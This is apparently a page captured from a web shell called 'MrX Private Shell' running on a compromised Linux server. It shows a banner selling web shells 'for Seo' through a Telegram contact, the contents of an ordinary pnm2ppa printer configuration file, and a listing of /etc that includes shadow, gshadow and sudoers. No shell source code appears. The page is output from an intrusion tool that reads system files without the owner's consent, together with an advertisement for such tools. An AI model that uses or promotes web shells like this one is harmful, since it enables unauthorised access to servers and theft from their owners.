__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Sample configuration file # # This file will be automatically read upon startup if it is placed in # /etc/pnm2ppa.conf # # uncomment entries by removing "#" to activate them. # #-----------set the printer model--------------------------- # The printer model will normally be set by a -v <model> command # line argument. Otherwise, if not set in the configuration file # it defaults to the 710/720 series. Remove/comment out the line # "version 0" below to get the default choice. # # If there is more than one "version" entry activated, the last one # will be used. The printer version can also be set with the command line # option e.g., "-v 720". version 710 #version 720 # 710, 712, 722 also acceptable #version 820 #version 1000 #--------control system log messages from pnm2ppa------------------- # pnm2ppa issues progress and error messages to the system log (syslog). # For security reasons, no input from the user is ever sent to the syslog. # The setting "silent 1" suppresses messages to the syslog. The # setting "verbose 1" sends messages to the standard error stream (stderr) # in addition to the syslog. (Note: if pnm2ppa was compiled with the # -D__NO_SYSLOG__ option (e.g., for BeOS), syslog messages are # diverted to stderr; use "silent 1" to suppress them.) #silent 1 #verbose 1 # (NEW FEATURE:) # standard informational messages ( when a job starts, when each page # prints, job finished, etc.) will not be recorded in the System Log, # unless explicitly activated here with the "log_info 1" keyword. # (i.e., "log_info 0" is the default.) # (Informational messages will still always be sent to stderr in "verbose" # mode, even if log_info is not set.) log_info 1 # <= COMMENT THIS OUT TO GET THE NEW DEFAULT BEHAVIOR! # Note: the "silent 1" and "log_info" keywords are only accepted from the # system configuration file (/etc/pnm2ppa.conf), and not from configuration # files specified by users with the pnm2ppa option "-f". #---------set the margins of the printed page------------------- # Margins: these are distances from the edges of the paper in # "dots" ( 600 dots = 1 inch = 2.54 cm). # Nothing outside these margins will be printed. # Default values are give below; uncomment and change, if necessary. # (Older versions of pnm2ppa required larger left and right margins to avoid # printer failure with "flashing lights", but this problem is believed to # be solved) #topmargin 10 #bottommargin 150 #leftmargin 10 #rightmargin 10 #----------center the printer output on the paper------------------- # Offsets: these are adjustments for centering the print correctly on the # paper. Units are dots (1/600 inch). Add a positive number of dots to # xoff to move the printed image to the right, relative to the paper. # add to yoff to move it down. The helper program calibrate_ppa prints # a test page to check the offsets (see CALIBRATON.txt): # usage: "calibrate_ppa --center | pnm2ppa --bw - - | lpr -l # Default values are: #xoffset 160 #yoffset 50 #------------align the black and color ink cartridges-------- # Color Offsets: these control alignment between the black ink # and color ink print cartridges. This changes a little whenever you # replace an ink cartridge, so the default values are just approximate. # # Use "calibrate_ppa --align | pnm2ppa --fd - - | lpr -l " # to print a test page to help you adjust the color offsets. # # The first line checks horizontal alignment ColOffsX,: # The second line checks vertical alignment ColOffsY,: # The alignment is correct if alignment patterns "0" is best. # If a diffent alignment pattern is best, add or subtract the + or # - value shown below it to ColOffsX or ColOffSy. # # See CALIBRATION.txt for more details. # Use "calibrate_ppa --test | pnm2ppa --fd - - | lpr -l " to check your # new settings. #ColOffsX 0 #ColOffsY 0 #---------------"shearing" corrections------------------------------------- # shearing correction (for bidirectional printing modes) # if there is a horizontal offset between right-to-left and left-to-right # sweeps of the print head, adjust these in units of 1"/600 (1 dot). # There are separate corrections colorshear and blackshear for the # color and black print heads. The third and fourth lines of the # alignment test page (see above) tests these. # The setting is correct when alignments "0" are correct. # The (positive or negative) number shown under the best-aligned shearing # alignment pattern tells you how much to change the colorshar or blackshear # value by. (For, example, if you print the calibration page with # "colorshear 0" (the default value) and the best pattern is labelled "-2", # uncomment the "colorshear" value below and set it equal to -2.) #colorshear 0 #blackshear 0 #-------------blackness control----------------------------- # this controls the density of black ink used. # valid blackness choices are 1 2 3 4; controls the # density of black ink used: 1 (least ink), 2 (default), 4 (most). # 0 = no black ink. This affects black ink bordered by whitespace # only (e.g. text, but not black in color images) #blackness 2 #------------Color correct curve Gamma parameters------------------------- # Gamma color correction values for Red, Green and Blue: # (Note: a more effective method of color correction is to use # a calibration file /etc/pnm2ppa.gamma, in which case these # Gamma values will not be used. See COLOR.html or COLOR.txt) # The pnm2ppa option --noGamma suppresses color correction. # The standard Gamma enhancement curve is # gEnh(i) = (int) ( pow ( (double) i / 256, Gamma ) * 256 ) # (i.e., 256 times ( i*(1.0/256)) to the power Gamma ), # where (int) i is the ppm color intensity, in the range 0 - 255. # positive values of Gamma enhance (increase the intensity of) # the corresponding color. Gamma = 1.0 corresponds to no # color correction, gEnh[i] = i. # You can specify Gamma values as a decimal number for each primary color #GammaR 1.0 # red enhancement #GammaG 1.0 # green enhancement #GammaB 1.0 # blue enhancement # For use with the printed output of "pnm2ppa -g ", # you can also specify Gamma values using the integer GammaIdx, # which gives Gamma = 1.0 - 0.033 * GammaIdx : #RedGammaIdx 0 #GreenGammaIdx 0 #BlueGammaIdx 0 # Default papersize (only used for printing the color calibration # test page with pnm2ppa -g). # Valid choices are: a4, letter, legal: #papersize letter # this is the default #papersize legal #papersize a4 #-----------suppress bidirectional printing--------------------- # by default the printing sweeps are now bidirectional (unimode 0); # to make unidirectional printing (left-to-right) the default behavior, # (unimode 1) uncomment the next line . (The command line options --uni # and --bi override the default behavior). You might wish to print # unidirectionally to avoid shearing effects in high-quality # color images, for example) #unimode 1 #------------switch off (color) data compression------------------ # Previously, data compression of color data sent to the printer # was not enabled. It is now enabled by default, but has only # been tested on HP71x/72xC models. Uncomment and set "compression 0" # to disable color data compression if necessary. #compression 1 #===================================================================== # the following are switches for debugging purposes only: # set their values to 0 to switch off the corresponding ink type: #black_ink 1 #color_ink 1 #cyan_ink 1 #magenta_ink 1 #yellow_ink 1
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ModemManager | Folder | 0755 |
|
|
| NetworkManager | Folder | 0755 |
|
|
| PackageKit | Folder | 0755 |
|
|
| UPower | Folder | 0755 |
|
|
| X11 | Folder | 0755 |
|
|
| alsa | Folder | 0755 |
|
|
| alternatives | Folder | 0755 |
|
|
| apache2 | Folder | 0755 |
|
|
| apm | Folder | 0755 |
|
|
| apparmor | Folder | 0755 |
|
|
| apparmor.d | Folder | 0755 |
|
|
| apport | Folder | 0755 |
|
|
| apt | Folder | 0755 |
|
|
| avahi | Folder | 0755 |
|
|
| bash_completion.d | Folder | 0755 |
|
|
| binfmt.d | Folder | 0755 |
|
|
| bluetooth | Folder | 0755 |
|
|
| brltty | Folder | 0755 |
|
|
| ca-certificates | Folder | 0755 |
|
|
| chatscripts | Folder | 2750 |
|
|
| cloud | Folder | 0755 |
|
|
| colord | Folder | 0755 |
|
|
| console-setup | Folder | 0755 |
|
|
| cracklib | Folder | 0755 |
|
|
| credstore | Folder | 0700 |
|
|
| credstore.encrypted | Folder | 0700 |
|
|
| cron.d | Folder | 0755 |
|
|
| cron.daily | Folder | 0755 |
|
|
| cron.hourly | Folder | 0755 |
|
|
| cron.monthly | Folder | 0755 |
|
|
| cron.weekly | Folder | 0755 |
|
|
| cron.yearly | Folder | 0755 |
|
|
| cups | Folder | 0755 |
|
|
| cupshelpers | Folder | 0755 |
|
|
| dbconfig-common | Folder | 0755 |
|
|
| dbus-1 | Folder | 0755 |
|
|
| dconf | Folder | 0755 |
|
|
| debuginfod | Folder | 0755 |
|
|
| default | Folder | 0755 |
|
|
| depmod.d | Folder | 0755 |
|
|
| dhcp | Folder | 0755 |
|
|
| dictionaries-common | Folder | 0755 |
|
|
| dpkg | Folder | 0755 |
|
|
| emacs | Folder | 0755 |
|
|
| environment.d | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| fwupd | Folder | 0755 |
|
|
| gdb | Folder | 0755 |
|
|
| gdm3 | Folder | 0755 |
|
|
| geoclue | Folder | 0755 |
|
|
| ghostscript | Folder | 0755 |
|
|
| glvnd | Folder | 0755 |
|
|
| gnome | Folder | 0755 |
|
|
| gnome-remote-desktop | Folder | 0755 |
|
|
| gnutls | Folder | 0755 |
|
|
| groff | Folder | 0755 |
|
|
| grub.d | Folder | 0755 |
|
|
| gss | Folder | 0755 |
|
|
| gtk-2.0 | Folder | 0755 |
|
|
| gtk-3.0 | Folder | 0755 |
|
|
| hp | Folder | 0755 |
|
|
| ifplugd | Folder | 0755 |
|
|
| init | Folder | 0755 |
|
|
| init.d | Folder | 0755 |
|
|
| initramfs-tools | Folder | 0755 |
|
|
| insserv.conf.d | Folder | 0755 |
|
|
| ipp-usb | Folder | 0755 |
|
|
| kdump | Folder | 0755 |
|
|
| kernel | Folder | 0755 |
|
|
| krb5.conf.d | Folder | 0755 |
|
|
| ld.so.conf.d | Folder | 0755 |
|
|
| ldap | Folder | 0755 |
|
|
| libblockdev | Folder | 0755 |
|
|
| libibverbs.d | Folder | 0755 |
|
|
| libnl-3 | Folder | 0755 |
|
|
| libreoffice | Folder | 0755 |
|
|
| lighttpd | Folder | 0755 |
|
|
| logcheck | Folder | 0755 |
|
|
| logrotate.d | Folder | 0755 |
|
|
| modprobe.d | Folder | 0755 |
|
|
| modules-load.d | Folder | 0755 |
|
|
| mysql | Folder | 0755 |
|
|
| needrestart | Folder | 0755 |
|
|
| netplan | Folder | 0755 |
|
|
| network | Folder | 0755 |
|
|
| networkd-dispatcher | Folder | 0755 |
|
|
| newt | Folder | 0755 |
|
|
| openvpn | Folder | 0755 |
|
|
| opt | Folder | 0755 |
|
|
| pam.d | Folder | 0755 |
|
|
| pcmcia | Folder | 0755 |
|
|
| perl | Folder | 0755 |
|
|
| php | Folder | 0755 |
|
|
| phpmyadmin | Folder | 0755 |
|
|
| pki | Folder | 0755 |
|
|
| plymouth | Folder | 0755 |
|
|
| pm | Folder | 0755 |
|
|
| polkit-1 | Folder | 0755 |
|
|
| ppp | Folder | 0755 |
|
|
| profile.d | Folder | 0755 |
|
|
| pulse | Folder | 0755 |
|
|
| python3 | Folder | 0755 |
|
|
| python3.13 | Folder | 0755 |
|
|
| rc0.d | Folder | 0755 |
|
|
| rc1.d | Folder | 0755 |
|
|
| rc2.d | Folder | 0755 |
|
|
| rc3.d | Folder | 0755 |
|
|
| rc4.d | Folder | 0755 |
|
|
| rc5.d | Folder | 0755 |
|
|
| rc6.d | Folder | 0755 |
|
|
| rcS.d | Folder | 0755 |
|
|
| rsyslog.d | Folder | 0755 |
|
|
| sane.d | Folder | 0755 |
|
|
| security | Folder | 0755 |
|
|
| selinux | Folder | 0755 |
|
|
| sensors.d | Folder | 0755 |
|
|
| sgml | Folder | 0755 |
|
|
| skel | Folder | 0755 |
|
|
| snmp | Folder | 0755 |
|
|
| speech-dispatcher | Folder | 0755 |
|
|
| ssh | Folder | 0755 |
|
|
| ssl | Folder | 0755 |
|
|
| sssd | Folder | 0711 |
|
|
| sudoers.d | Folder | 0755 |
|
|
| supercat | Folder | 0755 |
|
|
| sysctl.d | Folder | 0755 |
|
|
| sysstat | Folder | 0755 |
|
|
| systemd | Folder | 0755 |
|
|
| terminfo | Folder | 0755 |
|
|
| thermald | Folder | 0755 |
|
|
| tmpfiles.d | Folder | 0755 |
|
|
| ubuntu-advantage | Folder | 0755 |
|
|
| udev | Folder | 0755 |
|
|
| udisks2 | Folder | 0755 |
|
|
| ufw | Folder | 0755 |
|
|
| update-manager | Folder | 0755 |
|
|
| update-motd.d | Folder | 0755 |
|
|
| update-notifier | Folder | 0755 |
|
|
| usb_modeswitch.d | Folder | 0755 |
|
|
| vim | Folder | 0755 |
|
|
| vulkan | Folder | 0755 |
|
|
| wpa_supplicant | Folder | 0755 |
|
|
| xdg | Folder | 0755 |
|
|
| xml | Folder | 0755 |
|
|
| .pwd.lock | File | 0 B | 0600 |
|
| .resolv.conf.systemd-resolved.bak | File | 862 B | 0644 |
|
| .updated | File | 0 B | 0644 |
|
| adduser.conf | File | 3.36 KB | 0644 |
|
| anacrontab | File | 394 B | 0644 |
|
| apg.conf | File | 433 B | 0644 |
|
| bash.bashrc | File | 2.27 KB | 0644 |
|
| bash_completion | File | 45 B | 0644 |
|
| bindresvport.blacklist | File | 367 B | 0644 |
|
| brlapi.key | File | 33 B | 0640 |
|
| brltty.conf | File | 30.04 KB | 0644 |
|
| ca-certificates.conf | File | 6.36 KB | 0644 |
|
| crontab | File | 1.11 KB | 0644 |
|
| debconf.conf | File | 2.9 KB | 0644 |
|
| debian_version | File | 11 B | 0644 |
|
| deluser.conf | File | 1.67 KB | 0644 |
|
| dhcpcd.conf | File | 1.39 KB | 0644 |
|
| e2scrub.conf | File | 685 B | 0644 |
|
| environment | File | 106 B | 0644 |
|
| ethertypes | File | 1.81 KB | 0644 |
|
| fprintd.conf | File | 20 B | 0644 |
|
| fstab | File | 585 B | 0644 |
|
| ftpusers | File | 132 B | 0644 |
|
| fuse.conf | File | 694 B | 0644 |
|
| gai.conf | File | 2.52 KB | 0644 |
|
| gprofng.rc | File | 3.89 KB | 0644 |
|
| group | File | 1.69 KB | 0644 |
|
| group- | File | 1.68 KB | 0644 |
|
| gshadow | File | 1.49 KB | 0640 |
|
| gshadow- | File | 1.48 KB | 0640 |
|
| hdparm.conf | File | 4.34 KB | 0644 |
|
| host.conf | File | 92 B | 0644 |
|
| hostname | File | 29 B | 0644 |
|
| hosts | File | 243 B | 0644 |
|
| hosts.allow | File | 411 B | 0644 |
|
| hosts.deny | File | 711 B | 0644 |
|
| inputrc | File | 1.83 KB | 0644 |
|
| issue | File | 20 B | 0644 |
|
| issue.net | File | 13 B | 0644 |
|
| ld.so.cache | File | 71.91 KB | 0644 |
|
| ld.so.conf | File | 34 B | 0644 |
|
| legal | File | 267 B | 0644 |
|
| libao.conf | File | 27 B | 0644 |
|
| libaudit.conf | File | 191 B | 0644 |
|
| locale.alias | File | 2.93 KB | 0644 |
|
| locale.conf | File | 17 B | 0644 |
|
| locale.gen | File | 9.39 KB | 0644 |
|
| localtime | File | 232 B | 0644 |
|
| login.defs | File | 5.8 KB | 0644 |
|
| logrotate.conf | File | 586 B | 0644 |
|
| lsb-release | File | 99 B | 0644 |
|
| machine-id | File | 33 B | 0444 |
|
| magic | File | 111 B | 0644 |
|
| magic.mime | File | 111 B | 0644 |
|
| manpath.config | File | 5.11 KB | 0644 |
|
| mecabrc | File | 288 B | 0644 |
|
| mime.types | File | 76.45 KB | 0644 |
|
| mke2fs.conf | File | 775 B | 0644 |
|
| modules | File | 212 B | 0644 |
|
| mtab | File | 0 B | 0444 |
|
| nanorc | File | 11.48 KB | 0644 |
|
| netconfig | File | 767 B | 0644 |
|
| networks | File | 91 B | 0644 |
|
| nftables.conf | File | 243 B | 0755 |
|
| nsswitch.conf | File | 594 B | 0644 |
|
| os-release | File | 391 B | 0644 |
|
| pam.conf | File | 552 B | 0644 |
|
| paperspecs | File | 1.28 KB | 0644 |
|
| passwd | File | 3.97 KB | 0644 |
|
| passwd- | File | 3.94 KB | 0644 |
|
| pnm2ppa.conf | File | 7.47 KB | 0644 |
|
| printcap | File | 1.03 KB | 0644 |
|
| profile | File | 641 B | 0644 |
|
| protocols | File | 3.07 KB | 0644 |
|
| resolv.conf | File | 936 B | 0644 |
|
| rmt | File | 62.76 KB | 0755 |
|
| rpc | File | 911 B | 0644 |
|
| rsyslog.conf | File | 1.18 KB | 0644 |
|
| rygel.conf | File | 5.64 KB | 0644 |
|
| sensors3.conf | File | 10.34 KB | 0644 |
|
| services | File | 12.51 KB | 0644 |
|
| shadow | File | 2.16 KB | 0640 |
|
| shadow- | File | 2.09 KB | 0640 |
|
| shells | File | 118 B | 0644 |
|
| subgid | File | 117 B | 0644 |
|
| subgid- | File | 93 B | 0644 |
|
| subuid | File | 117 B | 0644 |
|
| subuid- | File | 93 B | 0644 |
|
| sudo.conf | File | 4.24 KB | 0644 |
|
| sudo_logsrvd.conf | File | 9.57 KB | 0644 |
|
| sudoers | File | 1.76 KB | 0440 |
|
| timezone | File | 15 B | 0644 |
|
| ucf.conf | File | 1.23 KB | 0644 |
|
| usb_modeswitch.conf | File | 1.49 KB | 0644 |
|
| vconsole.conf | File | 153 B | 0644 |
|
| vdpau_wrapper.cfg | File | 51 B | 0644 |
|
| vsftpd.conf | File | 5.97 KB | 0644 |
|
| vsftpd.userlist | File | 10 B | 0644 |
|
| vtrgb | File | 158 B | 0644 |
|
| wgetrc | File | 4.83 KB | 0644 |
|
| whoopsie | File | 30 B | 0644 |
|
| xattr.conf | File | 681 B | 0644 |
|
| zsh_command_not_found | File | 460 B | 0644 |
|